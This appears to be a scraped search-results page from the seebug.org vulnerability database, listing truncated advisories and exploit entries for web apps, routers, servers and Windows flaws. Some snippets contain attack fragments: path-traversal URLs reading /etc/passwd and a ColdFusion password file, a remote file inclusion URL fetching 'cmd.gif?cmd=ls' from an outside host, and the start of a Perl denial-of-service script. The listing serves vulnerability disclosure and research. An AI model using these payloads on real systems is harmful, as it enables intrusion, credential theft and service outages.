Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2017/12/04 12:0 a.m.207 views

TPshop 后台代码执行漏洞

0x01 说明 TPshop开源商城系统 Thinkphp shop的简称 ,是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Adroid客户端+微商城,系统PC+后台是基于ThinkPHP5 MVC构架开发的跨平台开源软件,设计得非常灵活,具有模块化架构体系和丰富的功能,易于与第三方应用系统无缝集成,在设计上,包含相当全面,以模块化架构体系,让应用组合变得相当灵活,功能也相当丰富。 下载地址:http://www.tp-shop.cn/Index/Index/download.html 目录大概结构 ├─index.p...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2017/04/15 12:0 a.m.207 views

ESKIMOROLL-ms14-068 Windows vulnerability in the Key Distribution Center (KDC) service (CVE-2014-6324)

Description MS14-068 is a Windows vulnerability in the Key Distribution Center KDC service. It allows an authenticated user to insert an arbitrary PAC a structure that represent all user rights in its Kerberos ticket the TGT. https://technet.microsoft.com/library/security/ms14-068.aspx In Windows...

9CVSS6.8AI score0.87448EPSS
Exploits8
seebug.org
seebug.org
added 2017/02/10 12:0 a.m.207 views

OpenBSD http server - denial of service vulnerability(CVE-2017-5850)

No description provided by source. !/usr/bin/perl -w curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs use warnings; use IO::Socket; use Parallel::ForkManager; $numforks = 50; if $ARGV \n"; sub killhttpd print "ATTACKING $ARGV0 using $numforks forks\n"; $p...

7.8CVSS7.5AI score0.17203EPSS
Exploits7
seebug.org
seebug.org
added 2015/11/09 12:0 a.m.207 views

WordPress 利用 XMLRPC 爆破

Author: RickGray 知道创宇404安全实验室 Date: 2015-10-09 xmlrpc 是 WordPress 中进行远程调用的接口,而使用 xmlrpc 调用接口进行账号爆破在很早之前就被提出并加以利用。近日 SUCURI 发布文章介绍了如何利用 xmlrpc 调用接口中的 system.multicall 来提高爆破效率,使得成千上万次的帐号密码组合尝试能在一次请求完成,极大的压缩请求次数,在一定程度上能够躲避日志的检测。 原理分析 WordPress 中关于 xmlrpc 服务的定义代码主要位于 wp-includes/class-IXR.php 和...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/10/17 12:0 a.m.207 views

live800客服系统任意文件下载漏洞

简要描述: 偷闲发个漏洞,许多大厂商在,用危害挺大的。 详细说明: 在live800客服站点上fuzz出一个downlog.jsp文件 这里以 华为 为例: http://robotim.vmall.com/live800/downlog.jsp 根据提示猜测有可能是downlog.jsp没有接收到下载路径,于是继续fuzz参数: downlog.jsp?path=/&file=etc/passwd downlog.jsp?filepath=/&file=etc/passwd downlog.jsp?filepath=/&filename=etc/passwd ……...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/12/15 12:0 a.m.207 views

ProFTPD TLS会话重协商明文数据注入漏洞

CVE ID: CVE-2009-3555 ProFTPD是一款开放源代码FTP服务程序。 ProFTPD的模块modtls存在OpenSSL的会话可重新协商选项的漏洞,导致攻击者可以在会话数据流中插入明文数据,操纵数据交互。 ProFTPD Project ProFTPD 1.3.x 厂商补丁: ProFTPD Project --------------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.proftpd.org/docs/RELEASENOTES-1.3.2c...

5.8CVSS0.87264EPSS
Exploits14
seebug.org
seebug.org
added 2021/07/22 12:0 a.m.206 views

D-LINK DIR-3040 服务组件使用默认密码(CVE-2021-21818)

The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed ...

5CVSS7.8AI score0.01948EPSS
Exploits2
seebug.org
seebug.org
added 2021/06/21 12:0 a.m.206 views

泛微E-mobile前台sql注入漏洞

...

0.8AI score
Exploits0
seebug.org
seebug.org
added 2017/09/14 12:0 a.m.206 views

Hikvision IP Camera Access Bypass

Access control bypass in Hikvision IP Cameras Full disclosure Sep 12, 2017 Synopsis: --------------- Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since at least 2014...

8AI score
Exploits0
seebug.org
seebug.org
added 2016/07/01 12:0 a.m.206 views

IBOS协同办公系统misc.php SQL注入

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/03/24 12:0 a.m.206 views

TRS(ids新老版本)设计缺陷(xxe/用户信息泄露包括密码等)

简要描述: TRSids设计缺陷xxe/用户信息泄露包括密码,好久没有发过漏洞了,突然上来看了看,发现漏洞提交页面都变了 详细说明: 首先我们看看web.xml配置文件: ServiceServlet com.trs.idm.admin.service.ServiceServlet ServiceServlet /service 跟进ServiceServlet protected void serviceHttpServletRequest request, HttpServletResponse response throws ServletException, IOExceptio...

7AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.206 views

HP-UX <= 10.20 newgrp Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/683/info Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. !/usr/bin/perl use FileHandle; sub h2cs local$stuff=@; local$rv;...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/05/19 12:0 a.m.206 views

Anymacro 邮件系统最新版SQL注入漏洞

简要描述: 厂商一直回复说,不是最新版的,现在我就捅几枚最新版的菊花出来,谢谢。。。 详细说明: 0x001 anymacro是国内较流行的一家企业级邮箱系统,客户主要为教育/政府机构。 今天所发现的SQL注入影响所有Anymacro所有邮件系统。 0x002 漏洞分析 本次属于黑盒测试。。。 漏洞点在网盘处,在下载里面的附件的时候,由于参数未进行判断,导致产生SQL注入漏洞 https://mail.xxx.com/down.php?netdisk=1...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/03/13 12:0 a.m.206 views

深澜软件鸡肋漏洞可被getshell

简要描述: 深澜软件鸡肋漏洞造成getshell 详细说明: 有好几个鸡肋漏洞,就造成了getshell。 本例以中枪的陕西科技大学为例。 1.爆路径问题http://xxxx.xx:8080/global.php,所有均存在路径泄露 不过实际路径是/srun3/srun/services/ (1)80端口路径/srun3/web/ (2)8800端口路径/srun3/srun/services/ (3)8080/8081端口路径/srun3/srun/web/ 2.管理后台(8080/8081端口),默认口令 support...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/03/15 12:0 a.m.206 views

Microsoft Windows远程桌面协议RDP远程代码执行漏洞(MS12-020)

BUGTRAQ ID: 52353 CVE ID: CVE-2012-0002 远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。 Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,然后控制系统。 0 Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server...

9.3CVSS9.2AI score0.73924EPSS
Exploits11
seebug.org
seebug.org
added 2007/03/16 12:0 a.m.206 views

CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit

No description provided by source. !/usr/bin/perl CcMail 1.0 Remote File Inclusion Exploit Download Script http://www.cicoandcico.com/download/ccmail/ccmail1.0.1.tar.gz Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl perl cra.pl http://site.com/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2021/05/26 12:0 a.m.205 views

VMware vCenter Server远程代码执行漏洞(CVE-2021-21985)

Rapid7 May 26, 2021 5:34pm UTC 1 day ago• Last updated May 27, 2021 6:39pm UTC 7 hours ago Technical Analysis Threat status: Impending threat Attacker utility: Network infrastructure compromise Description On Tuesday, May 25, 2021, VMware published security advisory VMSA-2021-0010, which includes...

10CVSS0.3AI score0.99999EPSS
Exploits58
seebug.org
seebug.org
added 2018/07/04 12:0 a.m.205 views

Major Vulnerabilities in Foscam Cameras

For the past several months, VDOO’s security research teams have been undertaking broad-scale security research of leading IoT products, from the fields of safety and security. In most cases, the research was carried out together with the device vendors for the sake of efficiency and transparency...

8.8AI score0.04465EPSS
Exploits7
seebug.org
seebug.org
added 2017/10/09 12:0 a.m.205 views

Dnsmasq Information Leak(CVE-2017-14494)

Sadly, there are no easy docker setup instructions available. Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client: python /poc.p...

4.3CVSS8.2AI score0.67549EPSS
Exploits5
seebug.org
seebug.org
added 2016/03/13 12:0 a.m.205 views

大华网络视频监控设备弱口令漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/05/13 12:0 a.m.205 views

程氏CMS v3.5 app/controllers/dance.php SQL注入漏洞

0x01 漏洞详情 漏洞页面 app/controllers/dance.php public function so $data='';$datacontent=''; $fid = $this-security-xssclean$this-uri-segment3; //方式 $key = $this-security-xssclean$this-input-getpost'key', TRUE; //关键字 $page = intval$this-input-get'p', TRUE; //页数 if$page==0 $page=1;...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/06/23 12:0 a.m.205 views

MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability

No description provided by source. Bl@ckbe@rD 'Tunisian TerrorisT' ------------------------- $$$$$$$$$$$$$$$$$$$$$$$---------------------------------------- + Script Name : MVC-Web CMS 1.0 and 1.2 Remote SQL Injection Exploit |+| Team : InjEct0r5 + Author : Bl@ckbe@rD 'Tunisian TerrorisT' + Conta...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/08/23 12:0 a.m.205 views

Apache Tomcat多个远程信息泄露漏洞

BUGTRAQ ID: 25316 CVECAN ID: CVE-2007-3385,CVE-2007-3382 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 Apache Tomcat处理用户请求数据时存在输入验证漏洞,远程攻击者可能利用此漏洞获取会话相关的敏感信息。 Apache Tomcat没有正确的处理Cookie值中的“" ”字符序列,且错误地将Cookie值中的单引号处理为分隔符,在某些情况下,这可能导致泄露敏感信息,如会话ID。 Apache Group Tomcat 6.0.0 - 6.0.13 Apache Group Tomcat 5.5.0...

4.3CVSS5.6AI score0.37497EPSS
Exploits4
seebug.org
seebug.org
added 2017/11/28 12:0 a.m.204 views

Exim Use-After-Free(CVE-2017-16943)

On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free UAF vulnerability, which leads to Remote Code Execution RCE; and CVE-2017-16944 for a Denial-of-Service D...

7.5CVSS8.4AI score0.6332EPSS
Exploits9
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.204 views

Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)

Adobe ColdFusion =8.0 http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en server替换成目标网站即可 Update:2017-04-28 This blog was written by Scott White, Senior Principal Security Consultant, Web Application Team Lead – TrustedSec TL;D...

7.5CVSS9.5AI score0.99721EPSS
Exploits13
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.204 views

MetaCart2 IntCatalogID Parameter Remote SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13382/info A remote SQL-injection vulnerability affects MetaCart2 because the application fails to properly sanitize user-supplied input before including it in SQL queries. An attacker may exploit this issue to manipulate...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/06/17 12:0 a.m.202 views

Discuz! x the use of SSRF remote command execution vulnerability

Content source: security think tank 0X01 ready to work jannock issued by Discuz conditional remote command execution,a lot of big stations affected, the online hasn't published details, in a safe public number to see on the jannock simple to say about the principle, is ssrf+redis/memcache issues,...

7.9AI score
Exploits0
seebug.org
seebug.org
added 2016/01/14 12:0 a.m.202 views

Shop7z admin/lipinadd.asp越权访问

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.202 views

Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability

No description provided by source. Affected Application: Mambo phpShop v1.2 RC2b Mambo CMS Component . . : contact : . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd/Found by: Charles Nelwan a.k.a Cmaster4 Team: BatamHacker irc.dal.net crew URL: http://www.batamhacker.info/forum...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2017/12/06 12:0 a.m.201 views

Claymore's Dual Ethereum Miner unauth stack buffer overflow(CVE-2017-16930)

VuNote =================== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16930 Version: 0.2 Date: Nov 30th, 2017 Tag: claymore dual ethereum decred crypto currency miner Overview -------- Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner Vendor: nanopool/claymore...

10CVSS10AI score0.3434EPSS
Exploits4
seebug.org
seebug.org
added 2017/04/28 12:0 a.m.201 views

Ruby on Rails 'implicit render' functionality Directory Traversal Vulnerability (CVE-2014-0130)

Impact ------ The implicit render functionality allows controllers to render a template, even if there is no explicit action with the corresponding name. This module does not perform adequate input sanitization which could allow an attacker to use a specially crafted request to retrieve arbitrary...

4.3CVSS6.3AI score0.53703EPSS
Exploits2
seebug.org
seebug.org
added 2016/05/06 12:0 a.m.201 views

Tipask 2.5 /control/question.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/11/12 12:0 a.m.201 views

Discuz 6.0 /my.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.201 views

Docmint 1.0/2.1 'id' Parameter Cross Site Scripting Vulnerability

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.201 views

Papoo CMS 3.2 IBrowser Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/19807/info Papoo CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious P...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/03/28 12:0 a.m.201 views

Postfix Admin 'functions.inc.php' SQL注入漏洞

BUGTRAQ ID: 66455 CVECAN ID: CVE-2014-2655 Postfix是Unix类操作系统中所使用的邮件传输代理。 用于程序没有在SQL查询前充分过滤用户提供的数据,允许攻击者危及应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。 0 Postfix Admin Postfix Admin 2.3.5 Postfix Admin Postfix Admin 2.3.4 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://sourceforge.net/projects/postfixadmin/...

6.5CVSS0.01848EPSS
Exploits2
seebug.org
seebug.org
added 2014/03/14 12:0 a.m.201 views

Kentico CMS用户名泄漏漏洞

Kentico CMS是一款内容管理系统。 由于应用程序没有限制访问CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx,可以泄漏有效的用户名。 0 Kentico CMS 7.x Kentico CMS 7.0.78版本以修复此漏洞,建议用户下载使用: http://www.kentico.com/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.200 views

EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability

No description provided by source. Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: powered by EQdkp Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.200 views

CartWIZ 1.10 AddToCart.ASP SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13330/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. Successful exploitatio...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/07/22 12:0 a.m.200 views

SDCMS某处设计缺陷导致遍历任意文件内容

简要描述: SDCMS某处设计缺陷导致遍历任意文件内容 详细说明: 1、首先看看缺陷文件: 文件/sdcms/admin/sdtheme.asp ...... 第138行: case "edit" dim filename:filename=sdcms.fget"filename",0 if notsdcms.checkstrfilename,"filename" then sdcms.echo "filename is wrong" sdcms.die end if if notsdcms.isfile"../theme/"&filename then sdcms.echo...

7AI score
Exploits0
seebug.org
seebug.org
added 2009/11/27 12:0 a.m.200 views

ISC BIND 9 DNSSEC查询响应远程缓存中毒漏洞

BUGTRAQ ID: 37118 CVECAN ID: CVE-2009-4022 BIND是一个应用非常广泛的DNS协议的实现,由ISC负责维护,具体的开发由Nominum公司完成。 启用了DNSSEC验证的名称服务器在解析递归客户端查询期间可能错误的从所接收到响应的附加部分向其缓存添加记录,这是一种缓存中毒的情况。...

2.6CVSS0.4AI score0.07952EPSS
Exploits1
seebug.org
seebug.org
added 2017/12/12 12:0 a.m.199 views

Apache Synapse远程命令执行漏洞(CVE-2017-15708)

0X00 介绍 Apache Synapse是一种轻量级的高性能企业服务总线(ESB)。Apache Synapse由快速和异步的中介引擎提供支持,为XML、Web服务和REST提供了卓越的支持。 0X01 分析 我们知道,完成反序列化漏洞需要存在两个条件: 存在反序列化对象数据传输 有缺陷的第三方lib库,例如Apache Commons Collections 在FoxGlove Security安全团队的@breenmachine的博文中,总结了非常全面可能使用反序列化的地方: 在HTTP请求中 RMI,RMI在传输过程中一定会使用序列化和反序列化...

0.8AI score0.17741EPSS
Exploits1
seebug.org
seebug.org
added 2016/11/08 12:0 a.m.199 views

GitLab 任意用户 authentication tokens 泄漏导致远程代码执行漏洞

漏洞分析参考: http://paper.seebug.org/104/ The project export feature serializes the user objects of team members and stores it in the project.json file. This object contains the authenticationtoken for every user, meaning that an attacker can simply go ahead and create a project on GitLab.com, add one...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2016/01/13 12:0 a.m.199 views

EuseTMS plancommentlist.aspx type SQL注射

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.199 views

wu-ftpd <= 2.6.1 - Remote Root Exploit

No description provided by source. / 7350wurm - x86/linux wuftpd remote root exploit TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be disclosed to third parties,...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2011/12/27 12:0 a.m.199 views

Lighttpd 1.4.30 / 1.5 Denial Of Service

No description provided by source. / Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit. Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang Here the vulnerable code...

5CVSS9.6AI score0.16246EPSS
Exploits8
seebug.org
seebug.org
added 2011/08/10 12:0 a.m.199 views

Microsoft Windows TCP/IP ICMP CVE-2011-1871远程拒绝服务漏洞

Bugtraq ID: 48987 CVE ID:CVE-2011-1871 Microsoft Windows是一款流行的操作系统。 Windows TCP/IP栈不正确处理特制构建的ICMP消息序列,远程攻击者可以利用漏洞发送特制消息使系统停止响应或自动重新启动。 Microsoft Windows Vista x64 Edition SP2 Microsoft Windows Vista SP2 Microsoft Windows Server 2008 R2 x64 SP1 Microsoft Windows Server 2008 R2 x64 0 Microsoft...

7.8CVSS6.3AI score0.38461EPSS
Exploits1
seebug.org
seebug.org
added 2008/09/01 12:0 a.m.199 views

VMware Consolidated Backup (VCB)用户密码信息泄漏漏洞

BUGTRAQ ID:30937 CVE ID:CVE-2008-2101 CNCVE ID:CNCVE-20082101 VMware ESX Server是一款企业级虚拟计算机软件。 VMware Consolidated BackupVCB命令行工具存在设计问题,本地攻击者可以利用漏洞获得用户密码信息。 VMware Consolidated BackupVCB命令行工具可通过-p命令接收密码,用户登录到服务控制台可以获得通过VCB命令行运行过程中的用户名和密码信息。 VMWare ESX Server 3.0.3 VMWare ESX Server 3.0.2 VMWare ES...

2.1CVSS6.7AI score0.0038EPSS
Exploits1
seebug.org
seebug.org
added 2006/12/27 12:0 a.m.199 views

myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities

No description provided by source. script name : myPHPCalendar Script Downloads : http://freshmeat.net/projects/myphpcalendar/ Web Site : http://myphpcalendar.sourceforge.net/ Version : 10.1 Risk : High Found By : Cr@zyKing Thanks : | eTNR | ApAci | Eno7 | TheHacker | Kormali46 | TheBekir |...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/06 12:0 a.m.199 views

Mambo Gallery Manager MosConfig_Absolute_Path远程文件包含漏洞

Mambo Gallery Manager是一款基于Mambo的图片程序。 Mambo Gallery Manager不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'help.mgm.php'脚本对用户提交的"mosConfigabsolutepath"参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Mambo Mambo Gallery Manager Component 0.95 r3 http://mamboxchange.com/projects/mgm/...

7.1AI score
Exploits0
Total number of security vulnerabilities5000